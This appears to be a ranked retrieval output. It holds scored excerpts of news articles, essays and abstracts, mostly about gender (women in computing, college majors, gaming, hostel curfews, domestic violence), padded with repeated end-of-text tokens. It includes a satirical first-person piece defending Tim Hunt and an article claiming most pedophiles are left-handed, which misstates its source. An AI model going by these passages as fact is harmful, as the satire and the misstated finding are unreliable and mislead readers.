suggests that women are more responsive to negative feedback than men in certain environments. We examine whether negative feedback in the form of relatively low grades in major-related classes explains gender differences in the final majors undergraduates choose. We use unique administrative data from a large private university on the East Coast from 2009-2016 to test whether women are more sensitive to grades than men, and whether the gender composition of major-related classes affects major changes. We also control for other factors that may affect a student's final major including: high school student performance, gender of faculty, and economic returns of majors. Finally, we examine how students' decisions are affected by external cues that signal STEM fields as masculine. The results show that high school academic preparation, faculty gender composition, and major returns have little effect on major switching behaviors, and that women and men are equally likely to change their major in response to poor grades in major-related courses. Moreover, women in male-dominated majors do not exhibit different patterns of switching behaviors relative to their male colleagues. Women are, however, more likely to switch out of male-dominated STEM majors in response to poor performance compared to men. Therefore, we find that it takes multiple signals of lack of fit into a major (low grades, gender composition of class, and external stereotyping signals) to impel female students to switch majors. + +Acknowledgments + +Machine-readable bibliographic record - MARC, RIS, BibTeX + +Document Object Identifier (DOI): 10.3386/w23735 + +Users who downloaded this paper also downloaded* these:<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 10; Score = 483328.0 +<|begin_of_text|>The history of geek culture and its exclusion of women + +Updated about 2 hours ago Fri 6 Nov 2015, 1:04am + +Computing never used to be seen as a masculine pursuit, but since the 80s we have witnessed a fascinating recalibration of tech and gender, as the beta males became alpha, writes Jeff Sparrow. + +The first 'computers' had names. They were Kay McNulty, Marlyn Wescoff, Fran Bilas, Ruth Lichterman, Adele Goldstine and Betty Snyder. + +In the 1940s, these women programmed the US Army's Electronic Numerical Integrator And Computer (ENIAC), known to the press at the time as "the giant brain" and recognised today as the first electronic general-purpose computer. + +ENIAC's operators were chosen from the clerks - known as 'computers' - who had previously been working out ballistic tables with desk calculators. Most were women, and because the job entailed crawling within ENIAC to manipulate its switches and cables, they came to understand the machine better than anyone. + +That's just one example of the important role women played in pioneering today's high technology. + +Famously, the very first piece of computer programming was performed by Ada Lovelace, who, in the 1840s, wrote an algorithm designed to be employed by Charles Babbage's "difference engine". Grace Hopper came up with the first computer compiler in 1952 and then established the programming language COBOL. Mary Keller helped develop BASIC; Radia Perlman built some of the protocols of the early internet. + +As Brendan Keogh explains in his fascinating essay about the development of computer gaming, many of these advances took place in male-dominated institutions such as military facilities and engineering laboratories. Nevertheless, during the postwar decades, the proportion of women studying computer science was growing rapidly, faster than in any professional fields. + +And then something happened. + +In a piece for NPR, Steve Henn notes that the participation rates for women in computer science began to fall in the mid-80s: that is, at about the same time as personal computers entered the home. + +At first, the association seems completely counter-intuitive. You'd think home access to computing would increase gender parity. + +But as Henn says: + +These early personal computers weren't much more than toys. You could play pong or simple shooting games, maybe do some word processing. And these toys were marketed almost entirely to men and boys. This idea that computers +================================================================================ +Rank = 11; Score = 475136.0 +<|begin_of_text|>This article updated from original, which appeared in Role Reboot. + +"Stop interrupting me." + +"I just said that." + +"No explanation needed." + +In fifth grade, I won the school courtesy prize. In other words, I won an award for being polite. My brother, on the other hand, was considered the class comedian. We were very typically socialized as a "young lady" and a "boy being a boy." Globally, childhood politeness lessons are gender asymmetrical. We socialize girls to take turns, listen more carefully, not curse and resist interrupting in ways we do not expect boys to. Put another way, we generally teach girls subservient habits and boys to exercise dominance. + +I routinely find myself in mixed-gender environments (life) where men interrupt me. Now that I've decided to try and keep track, just out of curiosity, it's quite amazing how often it happens. It's particularly pronounced when other men are around. + +This irksome reality goes along with another -- men who make no eye contact. For example, a waiter who only directs information and questions to men at a table, or the man last week who simply pretended I wasn't part of a circle of five people (I was the only woman). We'd never met before and barely exchanged 10 words, so it couldn't have been my not-so-shrinking-violet opinions. + +These two ways of establishing dominance in conversation, frequently based on gender, go hand-in-hand with this last one: A woman, speaking clearly and out loud, can say something that no one appears to hear, only to have a man repeat it minutes, maybe seconds later, to accolades and group discussion. + +After I wrote about the gender confidence gap recently, of the 10 items on a list, the one that resonated the most was the issue of whose speech is considered important. In sympathetic response to what I wrote, a person on Twitter sent me a cartoon in which one woman and five men sit around a conference table. The caption reads, "That's an excellent suggestion, Miss Triggs. Perhaps one of the men here would like to make it." I don't think there is a woman alive who has not had this happen. + +The cartoon may seem funny, until you realize exactly how often it seriously happens. And -- as in the cases of Elizabeth Warren or say, Brooksley Born -- how broadly consequential the impact can be. When you add race and class to the equation the incidence of this marginalization is even higher. + +This +================================================================================ +Rank = 12; Score = 464896.0 +<|begin_of_text|>Emergent attitudes toward brilliance The distribution of women and men across academic disciplines seems to be affected by perceptions of intellectual brilliance. Bian et al. studied young children to assess when those differential perceptions emerge. At age 5, children seemed not to differentiate between boys and girls in expectations of “really, really smart”—childhood's version of adult brilliance. But by age 6, girls were prepared to lump more boys into the “really, really smart” category and to steer themselves away from games intended for the “really, really smart.” Science, this issue p. 389 + +Abstract Common stereotypes associate high-level intellectual ability (brilliance, genius, etc.) with men more than women. These stereotypes discourage women’s pursuit of many prestigious careers; that is, women are underrepresented in fields whose members cherish brilliance (such as physics and philosophy). Here we show that these stereotypes are endorsed by, and influence the interests of, children as young as 6. Specifically, 6-year-old girls are less likely than boys to believe that members of their gender are “really, really smart.” Also at age 6, girls begin to avoid activities said to be for children who are “really, really smart.” These findings suggest that gendered notions of brilliance are acquired early and have an immediate effect on children’s interests. + +The career aspirations of young men and women are shaped by societal stereotypes about gender (1, 2). For example, the stereotype that men are better than women at mathematics (3) impairs women’s performance in this domain (4, 5) and undermines their interest in mathematics-intensive fields (6, 7). However, popular beliefs about ability associate not only specific cognitive processes (e.g., mathematical reasoning) with a particular gender but also the overall amount of cognitive ability. It is commonly assumed that high-level cognitive ability (brilliance, genius, giftedness, etc.) is present more often in men than in women (8–11). This “brilliance = males” stereotype has been invoked to explain the gender gaps in many prestigious occupations (12–15). However, little is known about the acquisition of this stereotype. The earlier children acquire the notion that brilliance is a male quality, the stronger its influence may be on their aspirations. The four studies reported here (N = 400 children) show that, by the age of 6, girls are less likely than boys to believe that members of their gender are “really, really smart”—a child-friendly way of referring to brilliance. Also +================================================================================ +Rank = 13; Score = 442368.0 +<|begin_of_text|>How a product exclusively for women beat the odds to make the Top 3 on Product Hunt + +Huong at Magpie Blocked Unblock Follow Following Mar 14, 2016 + +Before Magpie went live on Product Hunt, everyone told us that Product Hunt was not necessarily the best place for us, since our product is developed exclusively for the use of female users and most Product Hunters are men. Just for some context about what Magpie does — we’re a female travelers club, designed to help women easily find local friends sharing common interests, wherever they go. + +The companies featured on Product Hunt are mostly started by men, and female hunters and makers are in the minority. But that did not deter us from giving it a try. Throughout the day, we watched in awe as the support came streaming in. Starting the day at the bottom, we steadily climbed to where we ended the day, solidly in the top 3 and with the highest number of upvotes and comments. + +It’s never too late to vote for us, by the way, if you’d like to share us some love :-) We ended the day with over 600 upvotes as supporters continued to vote for us all over the world. We also saw very encouraging results: our sign-ups increased 20 times, and our site traffic increased 10 times. We also received a lot of press interview requests, partnership opportunities, and insightful user feedback. One fun fact: almost half of our upvotes came from women, making us probably the most upvoted product by PH women voters, woohoo!!! + +We had so much fun on Product Hunt on the auspicious Mag(Pi)e day ;-) and would love to share what we learn in case helpful to other startups going to launch on Product Hunt. + +Though we ended the day with the highest number of upvotes (over 500!) and comments, we still ranked second on the site. We found out that this was due to Product Hunt’s intriguing ranking methods that take in factors like organic search and how active your voters are on Product Hunt. + +Our Top Advice for Going Live on Product Hunt + +Getting featured takes some time. + +Product Hunt members can “hunt” products, but this doesn’t necessarily mean that they’re going to go live. Going live requires extra conversation with the Product Hunt team. They tend to be pretty responsive (especially over their super-useful live chat) but they also get bogged down pretty often because they all work really hard. Don’t be put off if you send them an email about being featured +================================================================================ +Rank = 14; Score = 423936.0 +<|begin_of_text|>WASHINGTON — Several Democratic members of the Congressional Black Caucus (CBC) agreed Thursday that racism is behind African Americans serving prison sentences at a disproportionate rate, but none of them thought systemic sexism was a factor in men being over 90 percent of federal prisoners. + +The disparity between men and women is much larger then the one between whites and blacks when it comes to criminal justice. In 2011, black people in America were 2.5 times more likely to be stopped on the street by the police than white folk. That same year, men were 8.3 times to face a street stop then women. + +Likewise, the disparity between men and women serving sentences in state and federal penitentiaries was much larger than it was for black people and white people in 2011. That year, African Americans were 5.8 times more likely than whites to be in a federal or state prison and men were 15.8 times more likely to be those same prisons than women. + +The Daily Caller spoke to five Democratic CBC members who believed that a racist system was to blame for the disparity between whites and blacks in the justice system. When asked about how sexism could then play a role in that same system, they gave various different answers. None agreed with the premise that “systemic sexism” could be at play. + +Congressional Black Caucus chairman Rep. G.K. Butterfield said, “I’m not going to say that men commit crimes at a higher frequency then women because I don’t know that to be true. I don’t really know the answer to it.” + +Two other lawmakers — Texas Democratic Rep. Marc Veasey and Mississippi Democratic Rep. Bennie Thompson — refused to entertain the question. New York Democratic Rep. Charlie Rangel and Washington, D.C Democratic Rep. Eleanor Holmes Norton believed that men and women had distinct differences leading to the different crime statistics. + +“Men and women aren’t comparable groups to compare when it comes to crime,” Norton told TheDC. She described differences between men and women as being “old as the millennia.” + +Rangel was more direct and suggested men are genetically predisposed to violence. + +“Men generally, which has nothing to do with racism, have a tendency to be disorderly more than women, that goes without saying. There’s more goddamn [male] prizefighters than women,” Rangel said. He added, “Men are built differently, men play football, they’re boxers, they do things that require strength, they’re more disorderly, they get into more trouble.” +================================================================================ +Rank = 15; Score = 411648.0 +<|begin_of_text|>Media playback is unsupported on your device Media caption Campaigners say the hostel curfews are ''discriminatory'' + +Young female students in the Indian capital, Delhi, are fighting to assert their right to public spaces with a campaign called Pinjra Tod (Break The Cage). The BBC's Geeta Pandey joins them for a night as they go out to "claim the streets" and fill them with their "dreams and desires". + +Just as night falls, about 60 young women and men begin marching through some of Delhi university's premier colleges. + +Many are carrying posters, they shout slogans, halt outside women's hostels, recite poems and break out into impromptu dances. + +"We don't need no false protection, you can't cage half the nation," they sing. + +One young man plays a drum hanging around his neck, while a woman wearing a red sari gives a lively speech. + +Image caption We are saying this is not about women's safety really, this is about moral policing" + +At regular intervals, the participants - Delhi university students past and present - whistle and clap in approval or chant "shame, shame". + +The issue that has brought all these men and women out on to the streets is what is called the "curfew hour" in women's hostels - the deadline by which residents must return to their rooms. + +"It is discriminatory," says Devangana Kalita, a 26-year-old researcher and co-founder of the Pinjra Tod movement. + +"Curfews and deadlines in the name of providing protection and safety are actually mechanisms of reproducing patriarchy. We are saying this is not about women's safety really, this is about moral policing." + +Image caption Protesters say the march to claim the streets by female students is "unprecedented" and "historic". + +Students say most women's hostels - whether run by the university or privately-owned - follow curfew hours. Some lock their gates as early as 6:30pm or 7:30pm while a few allow students to remain out until a little later. + +They say while curfew times are stringently enforced in women's hostels and those who break them run the risk of being expelled, hostels for men, which also have curfew hours on paper, rarely enforce them. + +Libraries and laboratories in the university are open until much later - till midnight or in some places, even until 2am - and curfew hours mean women have no access to them. + +"The university infantilises you," says Ms Kal +================================================================================ +Rank = 16; Score = 411648.0 +<|begin_of_text|>Story highlights Don McPherson: Not enough men speak out against domestic violence against women + +He says violence toward women affects men, too. Yet culture ignores, propagates it + +He says campaign "One million men. One million promises," to draw attention to it + +McPherson: Men can help in many small ways. Set example in treatment of women + +Dallas Cowboys tight end Jason Witten is the 2012 Walter Payton NFL Man of the Year. Why? In large part because of Witten's tireless commitment to ending domestic violence. As a former professional football player and longtime domestic violence prevention advocate, I understand how gratifying it is to receive this honor from the NFL. For the men engaged in this critical issue, it can be a lonely road. + +But now Witten has company in Dallas. Moved to action by a series of recent slayings, Mayor Mike Rawlings announced the launch of a citywide awareness campaign to show that domestic violence — and the culture that ignores or perpetuates it — has no home in his city. He's hoping at least 10,000 men show up to rally with that message on Dallas' City Hall Plaza later this month. + +A drive to end domestic violence, led by men. It's an idea whose time has come, again and again; some men have been pushing it for decades. But now many are hearing the call. + +As Rawlings said in a recent press conference: "In the past this has been viewed as a women's issue, but it ain't. It's our problem." The problem is not confined to a shocking spate of killings in Dallas, or to one major U.S. city. The New York Police Department reportedly receives 700 domestic violence calls every day. Domestic violence costs the United States more than $9 billion a year. More than 603 million women live in countries where domestic violence is not a crime. Globally, at least one in three women and girls are beaten or sexually abused in their lifetimes, usually at the hands of men. + +Donald McPherson + +What can men do? + +Men do not just need to stop being violent. The vast majority of men are not violent. But men do need to stop being silent. Calling violence against women, whether street harassment or sexual harassment or rape or murder, a "women's issue" allows men to ignore it as if we have no responsibility for it or stake in ending it. We all have grandmothers, mothers, sisters, daughters and female friends and colleagues. Our +================================================================================ +Rank = 17; Score = 405504.0 +<|begin_of_text|>45% of video gamers, and 46% of game purchasers, are women. More complex storylines, more personalized characters, more acceptance of ‘geekiness’ as something to be proud of and a wider variety of games available are just a few of the reasons why gaming is no longer being seen as a boys-only club. Women are finding their place in the gaming world., a YouTuber and gamer with 60,000 subscribers, is excited about the change. “More and more I feel like it is normal for a woman to play video games too. It's no longer "a guy thing". Growing up I often heard "What, you play video games?! That's so awesome, girls never play video games!", but now when you tell someone you play video games you'd sooner get the question what kind of games you're into, which is really nice.” GirlGamerGaB, a YouTuber and gamer with 60,000 subscribers, is excited about the change. “More and more I feel like it is normal for a woman to play video games too. It's no longer "a guy thing". Growing up I often heard "What, you play video games?! That's so awesome, girls never play video games!", but now when you tell someone you play video games you'd sooner get the question what kind of games you're into, which is really nice.” + +And yet, even the fantasy world still isn’t equal. But from gamers, to game developers, to women in games, we still have a long way to go before gaming becomes an gender-equal world....for women who play games: On paper, a female gamer’s customer experience should be no different to that of a man’s. In practice, the communal nature of gaming means that male gamers can make life pretty unpleasant for a female gamer… a ‘side effect’ of the product she didn’t sign up for. Women face roughly three times more harassment than men when playing online. Gamer and YouTuber Yasmin Uddin (known as Yammy xox) said she experienced sexism first hand, “mostly during games like Call of Duty and Gears of War. I was ashamed to speak in online game chat as I felt as if I’d be ridiculed for my voice.... I’d be told to ‘get back into the kitchen.” + +It’s not always that aggressive – but unwanted attention is still a distraction to women just looking to play the game. “A lot of people try to make flirty conversation +================================================================================ +Rank = 18; Score = 395264.0 +<|begin_of_text|>Pakistan is preparing for its first census in 19 years. Here are some facts about the upcoming enumeration exercise of the sixth most populous nation in the world. + +Read: All set for country’s biggest census exercise + +A third sex + +For the first time, transsexual people will be counted separately, according to representatives of this historically recognised but often persecuted community in the country. + +The forms had been printed well in advance of court decisions to include them in the count. Now enumerators have been informed that those surveyed will have three numeric choices for their gender: 1 for men, 2 for women, 3 for those who declare themselves transsexuals. + +Only nine languages + +Language is considered an essential tool in evaluating the makeup of multi-ethnic Pakistan — but only nine of the country's estimated 70 will be listed, to the dismay of many communities. + +No regional languages from sparsely populated Gilgit-Baltistan will be included nor will Gujrati — spoken by some Muslim immigrants from India who believe the lack of recognition will drive their mother-tongue towards oblivion. + +Examine: The future of Gujarati language in Pakistan + +Faith matters + +The census will provide an insight into the true number of religious minorities, especially Christians and Hindus. Estimates are approximate and disputed, ranging from 2 to 10 million for the former and 2.5 to 4.5m for the latter. + +Citizens can declare themselves Muslim, Christian, Hindu or Ahmadi. + +Otherwise, they can be “members of scheduled castes” — members of marginalised Hindu families, or “other”. There are no separate options for Sikhs, Parsis or Baha'i. + +Feeling flush + +One box asks households how many toilets they have — a particularly salient question in Pakistan, where the United Nations estimates up to 40 per cent of people defecate in the open air with dramatic health consequences, especially for children. + +Nationality + +The census gives two nationality options: Pakistani or foreign. + +But the army, which will conduct a parallel count, plans to be more precise mainly because of the country's Afghan refugees who are accused of everything from terrorism to trafficking. + +Many local officials fear Afghans could be counted as local and skew demography in favour of ethnic Pashtuns, whose political parties would benefit as a result. + +On the other hand, the estimated six million Pakistanis working abroad will not be counted. No information will be collected on internal migration — necessary to assess the political weight of a province where many people +================================================================================ +Rank = 19; Score = 370688.0 +<|begin_of_text|>The Iranian-Saudi Proxy Wars Come to Mali + +BAMAKO, Mali — In a country where two-thirds of the adults are illiterate, it is a privileged few who have the chance to study at the Mustafa International School. + +Located in the western suburbs of Bamako, a few blocks from the U.S. Embassy, the college-level seminary has just 180 students — 150 men and 30 women. They engage in an intensive curriculum that encompasses theology, history, philosophy, Arabic, Farsi, and world religions. They work in the school’s computer suite, equipped with 12 desktop computers, and get three meals a day at the seminary’s expense. And they do it all under the watchful eyes of the late Ayatollah Ruhollah Khomeini, former supreme leader of the Islamic Republic of Iran, whose likeness gazes down on them from his portrait, which hangs above the bookshelves of the school’s library. + +These young students are part of Mali’s tiny Shiite community: a group of about 10,000 families nationally, in a country where the Sunni majority makes up an estimated 95 percent of the population of 15 million. + +They’re also the stuff of Saudi nightmares. + +Historically, West Africa has had a tolerant approach to religious differences, shunning — at least until recently — the sort of Sunni-Shiite sectarian rivalries that have plagued the Middle East in favor of a patchwork of beliefs that incorporate Sufism, Maliki Islam, and traditional animist practices. But Mali — home to seminaries with ties to Iran, like the Mustafa International School, and where diplomatic cables released by WikiLeaks this summer reveal that Saudi Arabia is scrambling to fund its own competing schools, mosques, and cultural projects — provides a case study in how the enmity between Sunni Islam and Shiite Islam may be being spread, via Iranian and Saudi proxies, to places thousands of miles from the Middle East. + +Unlike most of Mali’s private schools and universities, which charge hefty fees, the Mustafa International School selects students from outside the capital and gives them free room and board. Few of the students hail from Mali’s elite families; rather, they are selected via tests administered to Shiite youth across the country. The highest achievers are offered the chance to continue their study in Iran. + +The school is able to afford such generous support for its students because it is backed by an Iranian university in Qom, a city considered holy by Shiite Muslims and famed for its Islamic learning. The state-run University of +================================================================================ +Rank = 20; Score = 368640.0 +<|begin_of_text|>FRESHMEN crowded the lecture hall at 9am for Humanities 110, the first class of their college careers. Elizabeth Drumm, the head of the programme, made some introductory remarks, her voice quavering. As some faculty members moved to take their places at a panel discussion, three demonstrators emerged from the wings of the auditorium. “We’re protesting Hum 110 because it’s Eurocentric,” one began. “I’m sorry, this is a classroom space and this is not appropriate,” Ms Drumm said, immediately cancelling the lecture. Thus began another academic year at Reed College, a liberal arts college in Portland, Oregon. + +Last academic year, a dozen or so students continuously occupied the three-day-a-week lecture series by sitting in front of the auditorium with cardboard signs, sometimes taping their mouths in protest at the absence of non-white voices in the syllabus. One even took to lecturing the freshman class on the podium from an alternate curriculum before the start of each session. But this year, the college’s president sent out an e-mail outlining the school’s dissent policy 16 minutes before the lecture began, warning that the administration would act against potential violations. Reed College students were ranked as the most liberal and the second most studious in Princeton Review’s survey of its top 382 liberal arts colleges. That compound of leftist politics and serious scholarship proved unstable last year as activists managed to cow the college’s administration, students and faculty alike. + +Get our daily newsletter Upgrade your inbox and get our Daily Dispatch and Editor's Picks. + +The protesters argue that the Humanities programme is racist because it ignores many of the world’s great civilisations and because its authors are overwhelmingly male and white. They point out that black students represent less than 3% of the school’s 1,400 students and argue that the administration has not done enough to support them. A good portion of the student body appear to support their goals and tactics. + +Assistant professor Lucia Martinez Valdivia, who describes herself as mixed-race and queer, asked protesters not to demonstrate during her lecture on Sappho last November. Ms Valdivia said she suffered from post-traumatic stress disorder and doubted her ability to deliver the lecture in the face of their opposition. At first, demonstrators announced they would change tactics and sit quietly in the audience, wearing black. After her speech, a number of them berated her, bringing her to tears. + +Demonstrators said Ms Valdivia was guilty of a variety of offences: she was a “race +================================================================================ +Rank = 21; Score = 368640.0 +<|begin_of_text|>Texas will not lack for influence in the U.S. House when the new Congress convenes in January. Despite representing a tiny percentage of Americans, white males from the Lone Star state will occupy six of the 21 committee chairmanships. Not bad, considering white Texan men account for only 3.35% of the U.S. population. + +The half dozen committee chairmanships will also represent the largest number for a state delegation since at least 1979, according to The New York Times. + +The six Texas chairmen will be K. Michael Conaway (Agriculture), Mac Thornberry (Armed Services), Jeb Hensarling (Financial Services), Michael McCaul (Homeland Security), Pete Sessions (Rules), and Lamar Smith (Science, Space and Technology). + +Four of them—Hensarling, McCaul, Sessions and Smith—were chairmen of their committees during the last Congress. + +“The six committees that will be run by Texans starting in January all have sway over large federal programs and commercial interests, and over the operation of the House itself,” the Times’ Derek Willis wrote. “The Rules Committee is essentially an arm of the leadership; it determines the rules of debate for legislation on the House floor.” + +But Texas won’t have as much sway in the House as it once did. “The Republicans having six committee chairs is certainly unprecedented, but it probably won’t mean that the Texas delegation is as powerful as it was when it had the majority leader and majority whip,” Sean M. Theriault, a professor in the Department of Government at the University of Texas, referring to the years 1995-2003, said in an email to the Times. + +-Noel Brinkerhoff + +To Learn More: + +In New Congress, House Committees Will Carry a Strong Texas Accent (by Derek Willis, New York Times) + +House Republicans Choose White Men to Head 20 of 21 Committees (by Noel Brinkerhoff, AllGov)<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 22; Score = 358400.0 +<|begin_of_text|>I’m a female scientist, and I agree with Tim Hunt. + +Allie Rubin Blocked Unblock Follow Following Jun 13, 2015 + +Nobel Prize winner Sir Tim Hunt recently caused a stir when he argued that male and female scientists should work independently, because women are a distraction to men in the lab. At a conference, he was quoted as saying, “Let me tell you about my trouble with girls… three things happen when they are in the lab… You fall in love with them, they fall in love with you and when you criticize them, they cry.” + +As improbable as it might sound, I am a female scientist, and I agree with Tim Hunt. + +First of all, Sir Tim’s comments are based on his personal experiences, and are therefore incontrovertible. Three hundred and fifty years ago, Isaac Newton saw an apple fall and decided that gravity existed. Three weeks ago, Tim Hunt saw a woman cry and decided that all women are unfit to be scientists. Science is based on observations, which are the same thing as universal proof. Even I know that, and I’m just a woman whose brain is filled to capacity with yoga poses and recipes for gluten-free organic soap. Once, I was lured into a trap in the woods because I followed a trail of Sex and the City DVDs for three miles into a covered pit. Do you really think I could do something as complicated as thinking about science? + +Second, Tim Hunt is correct in asserting that women are distracting to men in a lab setting, which greatly affects their productivity. Last month, my labmates and I had to burn our female coworker at the stake for witchcraft because we saw her holding an unwrapped tampon. Between building the stake, lighting an adequate fire, and waiting for her to die, we lost an entire day that we could otherwise have spent working. I make every effort to not distract my male colleagues; sometimes I have to work on my astrology charts from home when I’m menstruating or have leprosy, just so I can let the men in my lab focus on doing real science. It’s a small sacrifice I make that keeps morale in the lab way up. + +Tim Hunt also mentions that men and women are constantly falling in love with each other within the lab. This is true; I used to identify as homosexual before working with a group of bearded men and a set of phallic pipettes turned me straight. Once that happened, I couldn’t stop falling in love with every man I met. One time I fell +================================================================================ +Rank = 23; Score = 356352.0 +<|begin_of_text|>Feminism didn't kill men's rights advocate Earl Silverman Earl Silverman had his demons, and his pain must be taken seriously. But feminism isn't responsible for his death + +He was a hero of the Men's Rights movement. Three years ago, Earl Silverman, a self-described long-term survivor of violence at the hands of an abusive wife, turned his own home into the Men's Alternative Safe House, Canada's first domestic abuse shelter for men and their children. On Friday, he was found hanging in its garage, an apparent suicide. + +Silverman had been going through a period of intense personal stress lately – his death came just one day after he packed up his recently sold home. Just last month, he'd closed the shelter because he could no longer afford to maintain it. He had said he was struggling to keep up with his heat and grocery bills. + +Advertisement: + +In his dogged efforts to help men and to raise public awareness, Silverman worked to remove the stigma that can often prevent men from speaking out because of pride and fear and misunderstanding. Yet where Silverman came up short was in perpetuating the Men's Rights movement's fiction that there's any gender equity as far as violence and victims. The Calgary Herald recalled, in its coverage of his death, Silverman's oft-repeated insistence that "men are about as likely as women to say they have been the victims of domestic abuse." + +Despite the jokey, knee-jerk assumption that male abuse either isn't real or is only reserved for the henpecked and weak, there is no question that female abusers exist. There are male victims. Whether we're talking about violence or sexual abuse, we need to understand that, and to treat men who have been the victims of abuse with respect and compassion. + +Yet the truth isn't as tit-for-tat as Silverman made it out to be. The American Bar Association, for example, notes that the statistics bear out that "nearly 25 percent of women and 7.6 percent of men" have been raped and/or physically assaulted by a partner. Partner violence makes up roughly 20 percent of the violent crime against women, and 3 percent of it against men." These statistics don't distinguish partner gender. The ABA notes that "Most perpetrators of sexual violence are men" and that "Sexual violence against men is also mainly male violence." But tell that to Silverman's MRA fans, who are currently lamenting that he was a victim of "misandrist bullshit" and +================================================================================ +Rank = 24; Score = 354304.0 +<|begin_of_text|>Some psychologists argue that defining pedophilia as a criminal act or a mental disorder is not so black and white. A recent study conducted at the University of Windsor in Canada has found that pedophiles tend to be left-handed and often have superficial facial flaws, known as Minor Physical Anomalies (MPAs). Results show that certain aspects of neural development could affect a person’s risk for pedophilic tendencies. + +"Evidence is steadily accumulating to support a neurodevelopmental basis of pedophilia," lead researcher Fiona Dyshniku said in a statement. "If we find that pedophilia has a biological basis, with a very early, even prenatal onset, this will influence and hopefully improve methods of treatment for this group.” + +Dyshniku and her colleagues recruited 140 adult men referred to the Kurt Freund Laboratory of the Centre for Addiction and Mental Health in Toronto, who were evaluated for certain physical anomalies and right or left handedness. Each participant was assessed for their distressing or illegal sexual behavior using a forensic and medical file review, an interview regarding sexual history, and phallometric testing for erotic preference. + +Men from the study who researchers identified as pedophiles were more likely to have minor facial and head flaws compared to men who were not considered pedophiles. Men with facial and head deviations scored highest on indicators of pedophilia. These facial and head anomalies included non-detached earlobes, malformed ears, and a high or steepled palate. + +Facial malformations tend to develop due to the same primary embryonic tissue layer that forms the central nervous system during the first and second trimesters of pregnancy. These facial flaws, which are more prevalent among men, are usually caused by prenatal exposure to viruses, alcohol or drugs, obstetric complications, or nutritional deficiencies. + +"If we know more about the etiology of an injurious behavior, we can create more effective treatments and look toward prevention," added Rachel Fazio, clinical neuropsychologist and co-author of the study. "For years, it was thought that child molestation was somewhat of a learned behavior, potentially from the abusers having been sexually abused themselves as children. While this may be a factor in some cases, this is not the case in those with genuine pedophilia." + +Findings from the study also revealed that most pedophiles are left-handed, which is on par with similar studies in the past. Left- or right-handedness is decided very early in life and is a direct result of prenatal cognitive development. Between eight to 12 percent of the population +================================================================================ +Rank = 25; Score = 352256.0 +<|begin_of_text|>I know a number of men who seemed to make a point of marrying women who posed no threat of outshining their achievements—or even matching them. This viewpoint is no surprise in light of research by psychologists Kate Ratliff of the University of Florida and 